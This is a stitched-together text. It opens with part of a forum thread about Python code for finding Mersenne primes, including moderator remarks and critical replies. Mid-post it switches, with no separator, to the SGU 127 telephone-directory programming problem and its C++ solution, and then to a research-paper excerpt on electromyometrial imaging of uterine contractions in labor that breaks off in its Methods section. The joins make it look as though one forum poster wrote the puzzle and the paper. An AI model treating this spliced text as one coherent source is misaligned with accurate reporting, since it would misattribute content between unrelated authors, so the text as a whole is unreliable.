        if c in sieve:                  # c's a multiple of some base prime
            s = sieve.pop(c)            #     i.e. a composite ; or
        elif c < q:
            yield c                     # a prime
            continue
        else:                           # (c==q): or the next base prime's square:
            s = count(q+2*p, 2*p)       #    (9+6, by 6 : 15,21,27,33,...)
            p = next(ps)                # (5)
            q = p*p                     # (25)
        for m in s:                     # the next multiple
            if m not in sieve:          # no duplicates
                break
        sieve[m] = s                    # original test entry: ideone.com/WFv4f

def mod_mersenne(n, prime, mersenne_prime):
    while n > mersenne_prime:
        n = (n & mersenne_prime) + (n >> prime)
    if n == mersenne_prime:
        return 0
    return n

def is_mersenne_prime(prime, mersenne_prime):
    s = 4
    for i in range(prime - 2):
        s = mod_mersenne((s*s - 2), prime, mersenne_prime)
    return s == 0

def calculate_perfects():
    yield(2)
    primes = prime_sieve()
    next(primes)  # 2 is barely even a prime
    for prime in primes:
        if is_mersenne_prime(prime, 2**prime-1):
            yield(prime)

if __name__ == '__main__':
    for perfect in calculate_perfects():
        print(perfect)  # edited by Tom E.O'Neil to find Mprimes

2018-05-17, 21:19   #2
ONeil
Dec 2017
24×3×5 Posts

you can see it in action here: Hit run once its done loading.

https://repl.it/@TommyONeil/HumongousRubberyElements

Last fiddled with by Uncwilly on 2018-05-17 at 22:10 Reason: Made link unclickable.

2018-05-17, 22:11   #3
Uncwilly
6809 > 6502
"""""""""""""""""""
Aug 2003
101×103 Posts
32·1,019 Posts

I have again made a link of your's, not a hyperlink. The user needs to be more involved before you your code on their machine.

2018-05-17, 23:33   #4
ONeil
Dec 2017
111100002 Posts

Quote:
Originally Posted by Uncwilly
I have again made a link of your's, not a hyperlink. The user needs to be more involved before you your code on their machine.

Hi Uncwilly this is not referenced from my site. It resides at repl.it.
Is there anyway you could relink? Thanks 2018-05-18, 02:02   #5 Uncwilly 6809 > 6502 """"""""""""""""""" Aug 2003 101×103 Posts 217238 Posts Quote: Originally Posted by ONeil Hi Uncwilly this is not referenced from my site. It resides at repl.it. Is there anyway you could relink? Thanks Nope. I don't care where you placed the code. It is code that you wrote. You want to have users run it from their machine. There needs to be more user interaction before the code runs. Links to zip's or to pages that have a link to the files are ok. Linking directly to an exe or to page that runs code is not ok. When I previously told you about this you failed to understand where problems could pop up. 2018-05-18, 19:26 #6 nordi   Dec 2016 2×33 Posts The first step would be to know which part of your code needs to be optimized. Use Python's profiler to figure out where your code spends most of its time, then focus on that code. 2018-05-18, 19:28 #7 rogue     "Mark" Apr 2003 Between here and the 616210 Posts I suggest that you learn a language like C if you want speed. 2018-05-19, 05:48 #8 LaurV Romulan Interpreter     Jun 2011 Thailand 3×17×179 Posts @op: additional of what other people told you in the past about demonstrating your knowledge (or... ignorance) not only about math but also about programming, here you also proved that you don't know what a "sieve" is. This is not a sieve, it is an (extremely slow) program that finds mersenne primes. You use some wheel to find primes, then do LL test for each prime to see if the corespondent mersenne is itself prime. But you can not use the information to "sieve" anything with it. It should be nice if you could "sieve" the prime exponents in such a way to avoid doing at least few percents of the LL tests, even one percent of them, then THAT should have been A RESULT. Please note the uppercase letters. This what you show is crap. Last fiddled with by LaurV on 2018-05-19 at 05:50 2018-05-19, 08:36   #9 ONeil Dec 2017 24×3×5 Posts Quote: Originally Posted by LaurV @op: additional of what other people told you in the past about demonstrating your knowledge (or... ignorance) not only about math but also about programming, here you also proved that you don't know what a "sieve" is. This is not a sieve, it is an (extremely slow) program that finds mersenne primes. You use some wheel to find primes, then do LL test for each prime to see if the corespondent mersenne is itself prime. But you can not use the information to "sieve" anything with it. It should be nice if you could "sieve" the prime exponents in such a way to avoid doing at least few percents of the LL tests, even one percent of them, then THAT should have been A RESULT. Please note the uppercase letters. This what you show is crap. I maybe ignorant, but at least I'm trying to find Mersenne Primes. 2018-05-19, 09:28   #10 retina Undefined "The unspeakable one" Jun 2006 My evil lair 2·34·37 Posts Quote: Originally Posted by ONeil I maybe ignorant, but at least I'm trying to find Mersenne Primes. You are trying to reinvent the wheel. There is nothing wrong with reinventing the wheel, but first you have to determine what is wrong with the current wheel, and then improve on that. So far all you have done is make the same wheel in a less efficient manner. You have not put in any new concepts or designs, yet. You have implemented the well known LL test in a scripting language. We have all done that at some point just to get a feel for how things work. 
But it is not something important enough to post to a public board and expect everyone else to "improve" it for you. If you are really serious about it, learn about FFT and/or NTT (or preferably invent a new faster method) and implement the test in optimised assembly on your favourite high-performance CPU. THEN you will get some attention for doing something important.

2018-05-19, 11:46   #11
science_man_88
"Forget I exist"
Jul 2009
Dumbassville
20C016 Posts

Quote:
Originally Posted by ONeil
I maybe ignorant, but at least I'm trying to find Mersenne Primes.

y/k+(y-1)/(2kp)=1 iff 2p+1 divides 2kp+1 true or false.
# SGU 127 - Telephone directory

## Description

CIA has decided to create a special telephone directory for its agents. The first 2 pages of the directory contain the name of the directory and instructions for agents; telephone number records begin on the third page. Each record takes exactly one line and consists of 2 parts: the phone number and the location of the phone. The phone number is 4 digits long. Phone numbers cannot start with digits 0 and 8. Each page of the telephone directory can contain not more than $K$ lines. Phone numbers should be sorted in increasing order. For the first phone number with a new first digit, the corresponding record should be on a new page of the phone directory. You are to write a program that calculates the minimal number $P$ of pages in the directory. For this purpose, CIA gives you the list of numbers containing $N$ records, but since the information is confidential, without the phones' locations.

## Input

The first line contains a natural number $K$ ($0 < K < 255$) - the maximum number of lines that one page can contain. The second line contains a natural $N$ ($0 < N < 8000$) - the number of phone numbers supplied. Each of the following $N$ lines contains a number consisting of 4 digits - phone numbers in any order, and it is known that numbers in this list cannot repeat.

## Output

The first line should contain a natural number $P$ - the number of pages in the telephone directory.

## Sample Input

5
10
1234
5678
1345
1456
1678
1111
5555
6789
6666
5000

## Sample Output

5

## Solution

#include <iostream>
#include <cstdio>
using namespace std;

const int MAX = 16;
const int HEX = 1000;
int K, N;
int pData[MAX];

int main() {
    while (cin >> K >> N) {
        // reset the per-digit counters for each test case
        for (int i = 0; i < MAX; i++) pData[i] = 0;
        int nTmp, ans = 0;
        for (int i = 1; i <= N; i++) {
            cin >> nTmp;
            pData[nTmp / HEX]++;                        // count numbers by first digit
        }
        for (int i = 1; i <= 9; i++) {
            ans += pData[i] / K + (pData[i] % K != 0);  // ceil(count / K) pages per first digit
        }
        cout << ans + 2 << endl;                        // plus the 2 introductory pages
    }
    return 0;
}
## Introduction Two essential challenges in obstetrics worldwide are arrest of labor and preterm birth. Approximately 29% of women deliver via cesarean1, the majority of which are performed for labor arrest2. Cesarean deliveries increase the risks of maternal morbidity and neonatal respiratory morbidity compared to vaginal delivery3. Preterm birth occurs in 10.6% of women globally4, with increased infant risks of mortality before 5 years of age5, adverse long-term neurodevelopmental outcomes6, and an increased economic burden on the family and society7. Accurately assessing and interpreting uterine contractions is essential for diagnosing both labor dysfunction and preterm labor. In current clinical practice, overall signals generated by uterine contractions are measured qualitatively via tocodynamometry (TOCO) or quantitatively via an invasive intrauterine pressure catheter (IUPC)8. Previous studies have shown that these methods have limited ability to distinguish between women who will respond to induction/oxytocin augmentation and deliver vaginally and those that require cesarean9. Particularly, previous studies found that TOCO cannot identify patients who are in labor, at term or preterm10,11. In addition, between 30 and 50% of subjects diagnosed with preterm contractions go on to deliver at term12. Therefore, a better method capable of noninvasively imaging and quantifying uterine contractions is needed to address these clinical challenges. To enable safe, noninvasive monitoring of uterine contractions, we recently developed a new imaging modality, electromyometrial imaging (EMMI), which noninvasively images the electrical properties of uterine contractions at high spatial and temporal resolution up to 2 kHz in sheep13,14,15. We demonstrated and validated that EMMI could accurately map electrical activity onto the entire three-dimensional (3D) uterine surface by comparing uterine electrical signals derived by EMMI from the body surface measurements (up to 192 electrodes) to those measured directly from the uterine surface in sheep13. Moreover, using the sheep model, experimental simulation studies mimicking noise contaminations anticipated in a clinical environment demonstrated that the electrical noise error within physiological ranges has a minor effect on EMMI accuracy14,15. Herein, we describe the development of the human EMMI system, for use in women in labor. This human EMMI system was employed to robustly image the 3D electrical activation patterns of uterine contractions from nulliparous and multiparous subjects in the active first stage of labor and demonstrates that EMMI can noninvasively characterize the initiation and dynamics of uterine electrical activation during uterine labor contractions. EMMI 3D maps and indices provide new insights into human myometrial electrical maturation, which is the development of the capacity of the uterus to appropriately initiate and conduct electrical signals across the myometrium. Thus EMMI’s future clinical use will better characterize labor progression and facilitate labor management. ## Results ### Development and implementation of the human EMMI system The human EMMI system incorporates subject-specific body-uterus geometry and multiple channel electrical measurements (up to 192 electrodes) from the body surface to reconstruct complete electrical activities in sequential frames across the 3D uterus. In this study, human EMMI is performed on term labor subjects in three steps. 
First, a subject at ~37 weeks’ gestation undergoes an MRI scan while wearing up to 24 MRI patches containing up to 192 MRI-compatible fiducial markers around the body surface (Fig. 1a). Second, in the first stage of labor, when cervical dilation is at least 3 cm, and regular contractions are observed from the TOCO monitor, customized pin-type electrode patches are applied to the same locations on the body surface as the MRI fiducial markers. Because clinical devices such as a TOCO monitor and a fetal monitor must be applied to the abdomen to guide clinical decisions, the locations of the electrode patches were adjusted. To locate the electrode positions on an individual basis, an optical 3D scanner is used to record the actual electrode positions (Fig. 1b). Third, the subject undergoes body surface electrical recording (Fig. 1c). Each recording lasts ~15 minutes, and four recordings (up to one-hour total) are conducted for each subject in this study. The temporal sampling rate is 2048 Hz. Raw data of MR images, optical 3D scanning, and body surface electromyograms (EMG) are preprocessed to generate a subject-specific body-uterus geometry (Fig. 1d) and body surface potential maps over the body surface (Fig. 1d). The body-uterus geometry includes the coordinates of the body surface electrode locations (blue dots in Fig. 1d) and the discretized uterine surface site locations (See body-uterus geometry construction in Methods). Filtering and artifact removal is applied to the raw EMG recording to improve the signal-to-noise ratio (See EMG signal preprocessing in Methods). The Method of fundamental solutions16 was employed to solve the three-dimensional Cauchy problem to generate uterine potential maps (electrical activity distribution on the uterine surface as a function of time every 10 milliseconds, Fig. 1f). These potential maps are essentially a 4D time-series data set: electrograms (Fig. 1g, D time series data over the entire recording period) at multiple sites on the uterine surface in 3D. During a contraction, we determine the uterine electrical activation times by measuring the start times of uterine electrogram burst (UEB) at each uterine surface site, which will be used to form the isochrone map (Fig. 1h). In the isochrone map, warm colors denote regions of the uterus that are electrically activated earlier during a contraction, cool colors denote regions that are activated later, and gray regions that are inactivated. As shown in Fig. 1g and Fig. 1h, the EMMI uterine surface electrograms reflect the local electrical activities. For example, in Fig. 1g, the electrogram on the right has a UEB (where UEBs can be detected above the baseline at an SNR > 5 Decibels) that maps to a site (marked with a plus sign in Fig. 1h) in the isochrone map near the region of the uterus that is first activated. In contrast, the electrogram on the left does not show a UEB and maps to a site (marked with an asterisk) in the isochrone map that showed no electrical activity during the contraction. EMMI system (MRI scanner, optical 3D scanner, and electrode patches) is described in detail in the Methods section. ### Noninvasive imaging of human labor contractions A body surface EMG measured from the body surface of one representative subject (Subject #2) is shown in Fig. 2a. One recording segment from ~18th to 41st second was magnified. Figure 2b through Fig. 2e show sequential potential maps on the body surface and uterine surface in the anterior view in the time windows labeled as b, c, d, and e in Fig. 
2a, respectively. At each indicated time window, the body surface potential maps (body in Fig. 2b) were generated from the multichannel body surface electrode measurements. In comparison, the uterine surface potential maps (uterus in Fig. 2b) were reconstructed by EMMI. Unlike conventional EMG techniques, in which the electrical activities are measured only at the body surface, EMMI incorporates the subject-specific body-uterus geometry to generate sequential potential maps across the entire 3D uterine surface with high temporal resolution. The EMMI uterine surface potential maps enable noninvasive characterization of the electrical activities distributed over the entire uterine surface of a subject, and allow the detection of local electrical activities in the myometrium with high spatial resolution. Currently, the uterine surfaces consist of 320 evenly distributed vertices, and the spatial resolution is ~2.5 cm. The 4D spatial-temporal uterine surface potential map imaged by EMMI (in Figs. 2b through 2e) reveals the evolution of phase and magnitude inside a UEB. The uterine potential map can be reorganized into multichannel uterine surface electrograms based on the spatial locations on the 3D uterine surface. Each EMMI uterine surface electrogram reflects the local electrical activities of one uterine site. Based on the EMMI uterine electrograms during a uterine contraction, we define the electrical activation on the uterine surface by the initiation of a UEB. The term "uterine electrical activation time" or just "activation time" is used here to refer to the initiation time of the UEB. For the same representative subject shown in Fig. 2, the simultaneous TOCO signal and five representative uterine surface electrograms (A–E in Fig. 3b) from five uterine surface sites (Fig. 3d) during two consecutive uterine contractions are shown in Fig. 3a, b, respectively. For each EMMI uterine surface electrogram, UEBs were detected (Supplementary Fig. 2), labeled by the upward red step lines, and overlaid on the electrograms. The rising edge of the red step line indicates the activation time during the contraction (green arrows). During the first uterine contraction, uterine surface electrograms from sites A through D demonstrated clear UEBs, suggesting that uterine sites A to D were electrically activated. In comparison, no UEB was detected in the uterine electrogram from site E, indicating that the myometrium around site E was inactive. Thus, not the entire myometrium was electrically active and contributing to the uterine contraction. Inspecting all uterine surface sites, the earliest activation and the latest activation times can be detected and are marked by the dashed black vertical lines in Fig. 3a, b. EMMI uterine surface electrograms also suggest that the activation sequence among different uterine sites can change from one contraction to the next. For example, site B activated earlier than sites C and D in the first contraction, while site B activated after sites C and D in the second one (Fig. 3a). The detailed sequential activation process during the first contraction is demonstrated in Fig. 3c. The upper row shows the sequential uterine isochrone maps at different times. The warm-colored (red and yellow) regions activated early, the cool-colored regions (cyan and blue) activated late, and the gray-colored regions were not activated. The lower row shows the activation ratio (AR), defined as the percentage of uterine regions that were activated at times associated with each uterine map above.
AR is calculated as dividing the area of the activated uterine region by the total uterine area as a function of time. At the end of the activation process, the complete isochrone map of uterine activation (Fig. 3d) was generated to visualize the electrical activation pattern during the entire uterine contraction. The isochrone map reveals a complete 3D activation sequence, which does not show clear long-distance propagation. First, EMMI can detect the active or inactive region during a contraction. When a large portion of the uterus remains inactive, there is insufficient myometrium to support long-distance propagation. Second, even when a large portion of the uterus is active, we did not find cardiac-like long-distance propagation within the activated region. Based on the rich spatial and temporal information in the isochrone map, an EMMI activation curve can be generated to reflect the temporal change of the AR over time during the entire uterine contraction period (Fig. 3e). The morphology of the EMMI activation curve reflects multiple key features of uterine contraction. Maximal activation ratio (MAR) can be quantified as the total activated myometrium by the end of the contraction. The activation curve slope (ACS) is defined to reflect the slope of the activation process (black dashed line in Fig. 3e), defined as MAR divided by the time taken to reach MAR during a contraction. Based on the activation curve, the initial 33% of the active myometrium regions can be detected and defined as early activation regions and mapped back onto the 3D uterine surface to form the early activation map (Fig. 3f). In the early activation map, early active regions were shown in red, late active regions were shown in blue, and inactive regions were shown in gray (Fig. 3f). The fundus area (the 25% of the uterine surface area in the anatomical superior uterine segment, see Method) was labeled by the white dashed line (Fig. 3f), and the fundal early activation ratio (FAR) is defined as the percentage of early activation region located within the fundus area. FAR measures the extent of fundal myometrium involved in the early activation during a contraction. ### Imaging uterine contractions during labor in nulliparous patients EMMI was employed to study five nulliparous subjects (Subjects #1–5) in the active phase of term labor (Fig. 4). Subject #1 was imaged by EMMI when her cervical dilation was 3.5~4 cm (Fig. 4a). The prominent activation feature of the isochrone maps is that the activated myometrial regions were small (the gray indicates the inactive myometrium. MAR: 6.25%, 8.13%, and 19.38%) and primarily distributed at the middle and lower segments of the uterus. Based on the isochrone maps, the uterine activation curves were derived (blue curves in Fig. 4a; see details in Fig. 2e). For Subject #1, the uterine contraction activation curves were flat. The subject’s ACS values were low (0.25%/s, 0.22%/s, and 0.34%/s), and FAR values were zeros. The EMMI isochrone maps and indices suggested that the subject’s uterus was not yet electrically mature nor strongly engaged in generating forceful, synchronized contractions during the period of the electrical recording. It took 7.01 h for the subject to reach full cervix dilation after the electrical recording, and the average cervical dilation rates were 0.86 cm per h. Combined with the subject’s clinical data, EMMI findings suggest that uterine contractions involve a small amount of myometrium, as indicated by the low MAR, at the early stage of active labor. 
For Subject #2 (Fig. 4b), three representative contractions were imaged at 4.07 h before full cervix dilation. The subject’s cervical dilation remained at 4 cm unchanged throughout the electrical recording. Although the entire uterus was not activated during the contractions, as shown in the isochrone maps, the activated uterine regions are much greater than in Subject #1. The MAR has a higher value than those in the first subject, suggesting a higher value of MAR (38.75%, 48.44%, 50.31%). Interestingly, the MAR is increasing across different contractions during the electrical recording period, suggesting that the uterus is actively recruiting more myometrium (e.g., 12.56% more myometrium was recruited into the third contraction than in the first). Within the activated uterine regions, different activation sequences were imaged for the three contractions, and no fixed early activation regions were observed. However, all three contractions were activated from the anterior-inferior fundus and lateral areas of the uterus (red-yellow regions). Activation curve slope (ACS) also increased from 1.19%/s to 1.37%/s, representing a 0.18%/s increase, suggesting the active uterine regions contracted in a more synchronized fashion in the later contractions. Fundal early activation ratios (FAR) were 7.5%, 1.25%, and 36.25%, respectively, suggesting a more fundus-initiated uterine contraction in the third contraction. The cervical dilation of Subject #3 (Fig. 4c) was maintained at 5 cm during the electrical recording, which is 1 cm larger than that in Subject #2 (Fig. 4b). Three representative contractions were imaged at 14.41 h before full cervix dilation. However, the time to full dilation was 14.41 h, and the cervical dilation rate was 0.17 cm per h, indicating that this subject was in the latent phase of labor and had slow clinical labor progress. Similarly, we did not observe identical activation patterns and the existence of consistent initiation sites in Subject #2. Specifically, Subject #3 has high and increasing MAR for the three contractions (51.86%, 58.39%, and 65.22%). Similarly, the ACS also increased dramatically in the last two contractions (1.19%/s, 1.74%/s, and 1.75%/s). It was also noted that the early activation region (red-yellow) was dominantly located in the fundus region for the three contractions (FAR: 33.75%, 46.25%, and 31.25%), suggesting fundus-initiated contractions in this subject during the electrical recording. Despite the strong uterine contractions, the subject’s cervix dilated at a very slow rate of 0.17 cm per h to the full cervical dilation after the electrical recording. EMMI was used to examine two subjects with cervical dilation greater than 5 cm (Subjects #4 and #5). Subject #4 (Fig. 4d) was mapped at 6.5~9.5 cm cervical dilation and 0.23 h before full dilation, dilated at the rate of 2.17 cm per h, which was much faster than that observed in Patient #1–3. The uterus was highly active (MAR: 96.88%, 71.56%, and 83.13%), fairly synchronized (ACS: 2.15%/s, 2.00%/s, and 1.99%/s). and had high FAR (40%, 67.50%, and 56.52%). The MAR values of those contractions are much higher. Similar observations were made for Subject #5 (Fig. 4e). Considering that both Subjects #4 and #5 have strong uterine contractions suggested by high MAR, ACS, and FAR, the significant difference in cervical dilation rates between the two subjects suggested an inter-subjects difference in cervix properties as we observed for subjects earlier in active labor (Fig. 4b, c). 
### Imaging uterine contractions during labor in multiparous patients Five multiparous subjects were imaged by EMMI (Fig. 5). Similar to the findings in the nulliparous subjects, no fixed initiation sites or consistent activation patterns during uterine contractions were observed. In contrast to the uterine contractions imaged at the early stage of active labor in nulliparous subjects (Fig. 4a, b), EMMI found larger MAR, ACS, and FAR values in the uterine contractions from multiparous subjects (Fig. 5a, b). Subject #6 was mapped at 4 cm cervical dilation, 6.95 h before full dilation, and progressed at 0.86 cm per h after mapping. The MAR (38.75%, 52.50%, and 73.44%) were high and increasing. The ACS (0.91%/s, 1.20%/s, and 2.11%/s) and FAR (6.25%, 12.50%, and 58.75%) followed the same trend as the MAR, indicating the subject was experiencing uterine contractions with quickly increasing strength during the period of the electrical recording. In Subject #7, the cervical dilation range was 4~4.5 cm, and the time to full dilation was 1.62 h. Her labor progressed at dilation rates of 3.39 cm per h. The MAR (50.93, 40.68%, and 42.86%), ACS (2.37%/s, 1.41%/s, and 1.02%/s), and FAR (36.25%, 3.75%, and 15.00%) were high in this subject. In the early stage of active labor, EMMI found that the uterine contractions in the multiparous subjects seem stronger than those in the nulliparous subjects, which may suggest earlier electrical maturation. At the later stage of active labor in the multiparous subjects (Fig. 5c–e), the MAR, ACS, and FAR values were not significantly increased compared to the nulliparous subjects (Fig. 4c–e). Subject #8 was mapped at 5 cm cervical dilation, 3.47 h before full dilation, and progressed at 1.44 cm per h after mapping. The MAR (20.94%, 25.63%, and 25.31%) was <30%. The ACS (0.43%/s, 0.43%/s, and 0.49%/s) were small and FAR (16.25%, 21.25%, and 8.75%) were normal. In Subjects #9 and #10, labor progressed at dilation rates of 2.47 cm per h and 3.52 cm per h, which are ~2.5 and 3.4 times faster than the average rate of 1 cm per h for 90% of the population. The cervical dilation ranges were 5~6.5 cm and 6.5~8 cm, and the time to full dilation was 1.42 h and 0.57 h, respectively. The MAR (15.63%, 19.38%, and 35.63%; 10.31%, 26.25%, and 31.25%) was <40% in both cases. The ACS (0.40%/s, 0.66%/s, and 1.09%/s, 0.26%/s, 0.54%/s, and 0.46%/s) was small and the FAR (6.25%, 7.50%, and 35%, 10.00%, 21.25%, and 31.25%) were normal. These findings may suggest that uterine contractions with lower MAR at the later stage of active labor are sufficient to remodel the cervix effectively and rapidly in the multiparous subjects. ## Discussion In addition to the TOCO monitor and intrauterine pressure catheter (IUPC), multiple research tools have been developed and evaluated to study and evaluate uterine contractions. Magnetomyography (MMG) detects the subtle uterine magnetic activities with an array of superconducting quantum interference devices (SQUID)17, including 151 sensors arranged in a fixed pattern to collect signals from the anterior abdominal region without much attenuation and distortion from the interfaces in volume conductor18,19. Although MMG data correlate with contractile events perceived by mothers and provide distribution maps of local uterine activity, this method does not provide a three-dimensional view of the entire uterus. It requires a large piece of specialized equipment in a magnetically shielded room to measure the weak MMG signals. 
Electromyography (EMG, also called electrohysterography, EHG) has been developed as an alternative way to noninvasively monitor the uterine electrical activity underlying contractions via several electrodes placed on the anterior part of the abdomen20,21. These EMG signals measured on the body surface are the spatial integral of action potentials from the underlying uterine smooth muscle (myometrial) cells22. EMG can be used to generate a uterine activity tracing that emulates TOCO and is more reliable than TOCO in patients with obesity23, providing objective measurement of regional electrical activities. Specifically, some EMG studies have revealed that the electrical propagation velocity increases in active labor compared to non-active labor24,25,26,27, although previous studies have also reported conflicting findings. Additionally, several features of EMG signals, such as the intensity, peak frequency of the power spectrum, etc., show some promise in identifying the onset of labor28,29,30,31,32,33,34,35,36. Although the development of EMG has shed light on electrical activation during contractions, EMG is still limited to measuring a small area on the maternal abdomen and does not have sufficient spatial coverage and specificity to reflect the electrical activation pattern on the entire 3D uterine surface. This may well explain the complex and heterogeneous electrical activity propagation patterns measured with a limited number and non-standard configuration of body surface electrodes in subjects during active labor27,37,38,39. In theory, one can overcome the limitations of body surface EMG by placing electrodes directly on the uterine surface. However, those invasive studies are usually challenging to conduct in animals and unethical in humans. To address these limitations and inspired by the success of the sheep EMMI system13,14,15, we developed a human EMMI system and demonstrate its unique advantage, i.e., noninvasively imaging the electrical activities underlying uterine contractions during labor across the entire 3D uterine surface at high spatial and temporal resolution (Fig. 1). Uterine surface potential maps imaged by EMMI provide a noninvasive measure of uterine contraction patterns without the need for surgery and placement of uterine surface electrodes (Fig. 2). EMMI can also image the uterine surface electrograms to reflect the local uterine electrical activities (Fig. 3). Based on the morphology of the EMMI uterine surface electrogram across the entire uterine surface with high spatial resolution, the inactivated myometrium regions can be well delineated, which cannot be quantified by conventional body surface EMG (Fig. 3). For the activated uterine regions, the derived activation sequence (isochrone map) reflects the uterine contraction pattern (Fig. 3). Based on our EMMI findings in both nulliparous and multiparous subjects, not the entire uterus is active during uterine contractions, especially in the early phase of labor. This cannot be detected by the conventional TOCO or body surface EMG (Figs. 4 and 5). Distinct from rhythmic cardiac activation, uterine contraction has dramatically different activation patterns from contraction to contraction. This is consistent with previous findings of the absence of a predominant propagation direction40,41.
Our results indicate that there are no consistent early activation regions in different uterine contractions, and this is direct evidence against an anatomically fixed, cardiac-like pacemaker region in the human myometrium41. Finally, long-distance propagation of activation is also not evident in human uterine contraction41,42,43. This human EMMI study thus demonstrates that EMMI can noninvasively provide rich information on human uterine activation patterns. EMMI isochrone maps provide detailed activation sequences over the entire activated uterine regions. Based on the information in the 3D isochrone map, the activation curve describes the percentage of activated uterine area at different over the course of a contraction (Fig. 3) and reflects the temporal progression of myometrium activation. Two EMMI indices, maximal activation ratio (MAR) and activation curve slope (ACS), can be defined (Fig. 3) from the uterine activation curve. Particularly, MAR indicates the total surface area of the uterus that becomes electrically active during an individual contraction; and ACS indicates the rate of the uterine electrical activation development. Although we observed the overall monotonic increase of MAR and ACS during the electrical recording period of the active phase of human labor, MAR and ACS may temporally decrease and fluctuate in some cases (Fig. 4e, Fig. 5b). This can be potentially explained by the presence of the refractory regions generated by the complicated and dynamically changing activation sequences during uterine contractions. In addition, based on the anatomy of the uterine fundus and the early activations (the 33% active uterine sites that activate first), we define the third EMMI index, fundal early activation ratio (FAR) (Fig. 3). Although no fixed, cardiac-like pacemakers were observed by EMMI in our study, FAR objectively quantified the percentage of the fundal region that contributed to the early activation and generated contractions to dilate the cervix. In comparison to the overall increasing trend of MAR and ACS during labor, FAR demonstrated more contraction-to-contraction variations. This is consistent with the dynamic nature of uterine activation patterns and can be potentially used as a novel imaging biomarker to reflect the uterine contraction pattern during normal and arrested labor2,44. As described herein, we have developed a human EMMI system and imaged human uterine contractions during active labor in 10 subjects (5 nulliparous and 5 multiparous subjects). With the uterine activation pattern images and newly defined indices, EMMI will allow us to “see” and quantify the uterine contractions in 3D for each individual subject during labor and provide new insights about human labor progression beyond cervical dilation. In the nulliparous subject group, EMMI observed weaker, less synchronized, and less fundus-dominated contractions at the early stage of active labor. The uterine contractions became much stronger and synchronized in the later stage of active labor. It is known that both cervical properties (such as stiffness, etc.) and uterine contractions affect labor progression. Poor labor progression or labor arrest can be caused by insufficient uterine contraction, stiff cervix, or both. The EMMI isochrone maps, early activation maps, activation curves, and indices provide new quantitative characteristics of the uterine contributions to labor progression. This will be critical to clinically confirm or exclude the uterine causes of slow labor progression. 
For example, the slow labor progression in Subject #3 was not caused by the inactive uterus, but potentially by a stiff and slowly-dilating cervix (Fig. 4c). In the multiparous subject group, stronger uterine contractions were indicated by the larger MAR, ACS, and FAR values were observed in the early stage of the active labor. This suggests the faster electrical maturation of the uterine contraction compared with that of nulliparous subjects. This finding supports the “myometrium memory” effect in multiparous subjects43,45,46. In addition, EMMI found uterine contractions with lower MAR at the later stage of active labor in the multiparous subjects in comparison with the nulliparous groups. However, the weaker contractions seem sufficient to dilate the cervix at a faster rate than that observed in the nulliparous group. This finding suggests that the cervix of multiparous subjects may be generally softer and easier to be dilated than the cervix of nulliparous subjects, consistent with what is clinically observed. The clinical utility of EMMI-derived outputs will require prospective clinical trials involving multiple EMMI assessments throughout labor, for example, the correlation of MAR with cervical dilatation. In this initial study with the 10 uncomplicated singleton pregnancies studied with EMMI in labor at 37w0d – 40w6d gestation and at cervical dilatation between 3.5 and 9.5 cm, we observed that nulliparous subjects demonstrated different phenotypes from the multiparous subjects (Figs. 4 and 5). These initial results may be suggestive of subgroups of uncomplicated nulliparous women in labor. In this first human EMMI study, we derive the intuitive EMMI indices, such as MAR, ACS, and FAR, which relate to organ-level electrical activity patterns and propagation. We found that the EMMI-derived human uterine activation curves have a sigmoidal evolution nature with respect to time, which potentially reflects the bioelectrical stimulation-response dynamics during uterine contractions47. An earlier in vitro study using the rabbit uterine muscle studied the relationship between maximum contraction tension and duration/strength of electrical stimulation48. They found Hill’s force-velocity relationship between the kinetics of isotonic contractions as a function of load (tension). EMMI-derived human uterine activation curves clearly confirm a potential regenerative process in human uterine contractility using a positive feedback mechanism. These findings will enable future studies to derive a comprehensive and uterus-relevant physiological assessment of human uterine contractions using EMMI. Although we focus on the technological development and scientific benefits of the EMMI system in this work, EMMI holds great potential for wide clinical application. Pitocin, a synthetic version of naturally derived oxytocin, is the most commonly used medication to augment labor progress. However, oxytocin is released in a pulsatile fashion, while Pitocin is given in an escalating, continuous drip, titrated to contraction frequency and intensity. But nothing is known regarding the direct effect of Pitocin on myometrial electrical activation and propagation, and whether or not this non-physiologic delivery is optimal has never been explored. EMMI will enable these explorations and uncover further insights regarding the physiology of labor and labor management. There are several limitations to the current human EMMI system and analyses that can be addressed and improved in future work. 
Currently, a large number of BioSemi Active electrodes (BioSemi B.V, Amsterdam, The Netherlands) are placed around the subject’s body surface. In order to speed up electrode application, increase the comfort of wearing those electrodes, and decrease the cost, we are currently developing low-cost, elastic, disposable electrode patches using printing technology49,50,51. Optimization of electrode number and distribution will also increase subject compliance with the EMMI system. Another factor limiting the scalability and accessibility of the current human EMMI system is the availability and cost of MRI. A portable and low-cost ultrasound imaging system that is widely available in obstetric clinics can be integrated with the EMMI system to acquire the subject-specific body-uterus geometry. The current EMMI study only imaged uterine contractions for 1-hour from a small number of subjects. Longer electrical recordings covering the entire labor process from a larger normal-term labor subject cohort will enable us to build the “normal term atlas” describing the detailed electrophysiology and normal standards of uterine contractions at high temporal and spatial resolution. This atlas will facilitate translational studies to define the mechanisms underlying normal human labor and identify EMMI uterine contraction indices and the spatial-temporal signatures of uterine contractions that may be altered in subjects with labor arrest and preterm contractions. In the longer term, this atlas could be used in clinical trials aimed at testing interventions to prevent labor complications such as labor arrest, preterm birth, and postpartum hemorrhage. ## Methods ### Study implementation This study was approved by the Washington University Institutional Review Board (No. 201612140). Nulliparous and multiparous subjects were recruited, and those willing to participate underwent informed consent. The subjects were compensated 50 USD for MRI and 50 USD for labor mapping in the form of prepaid gift cards. In this manuscript, deidentified data from 10 term subjects are presented, among which 5 are nulliparous and 5 multiparous. The ages of the subjects were in the range of 18–37 years old. The cervical dilation of the subjects during the EMMI mapping was in the range of 3.5 to 9.5 cm. The subjects underwent MRI at ~37 weeks’ gestation and then underwent electrical mapping for 1 h during the first stage of labor. Detailed subject information is in Table 1. ### EMMI system Before MRI scanning, two adhesive measuring tapes were placed on the body surface to guide the placement of MRI markers (Fig. 1). For the abdominal surface, a measuring tape of 30 cm was placed vertically through the midline using the umbilicus as a biomarker and another tape of 61.3 cm was placed horizontally about 4 cm below the fundus over the vertical tape. The fundus was located by an obstetric clinician. Similarly, the back surface, a measuring tape of 30 cm was placed vertically along the spine and ending at the coccyx; another tape of 61.3 cm was placed horizontally at the upper edge of the ilium over the vertical tape. Up to 24 adhesive vinyl-silicon patches containing up to 192 MRI-compatible markers were placed referencing the measuring tapes on the subject’s body surface to mimic the electrodes for electrical recordings during active labor. MR images were acquired with the subject in either the supine or left lateral position. 
